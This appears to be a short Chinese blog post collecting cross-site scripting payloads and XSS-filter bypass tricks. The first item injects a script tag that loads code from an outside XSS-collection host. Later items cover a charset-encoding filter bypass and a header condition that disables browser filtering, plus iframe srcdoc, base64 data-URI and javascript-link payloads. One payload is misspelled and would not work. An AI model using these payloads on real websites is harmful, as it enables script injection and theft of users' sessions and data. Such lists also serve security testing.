最新消息:

xss用到的代码

admin 6663浏览 0评论

1、http://www.wooyun.org/bugs/wooyun-2013-034003

<textarea/>"><img src=1 onerror="with(document)body.appendChild(createElement(String.fromCharCode(115,99,114,105,112,116))).src='//pxss.sinaapp.com/l6OBji'">
<textarea/><iframe src=http://www.baidu.com/></iframe>

2、只有数据包中http头含有X-XSS-Protection并且值为0的时候,浏览器才不会开启xss filter。

3、可以利用字符编码来绕过XSS Filter的方法,当编码是is-2022-kr时浏览器会忽略%0f,这样我们在onerror后面加个%0f就能绕过filter,前提是注入一个<meta charset=ISO-2022-KR>

4、<iframe srcdoc='<script>alert(1)</script>'>

不是以on开头的  又可以执行JS的iframe属性。

5、<a href=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=>aa</a>

6、<a href=javascirpt:alert(1)>请点击</a>

7、<iframe/onload=alert(1)>

8、

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWHNzVGVzdCIpOzwvc2NyaXB0Pg=="></object>

9、一些有趣的XSS Vector

发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址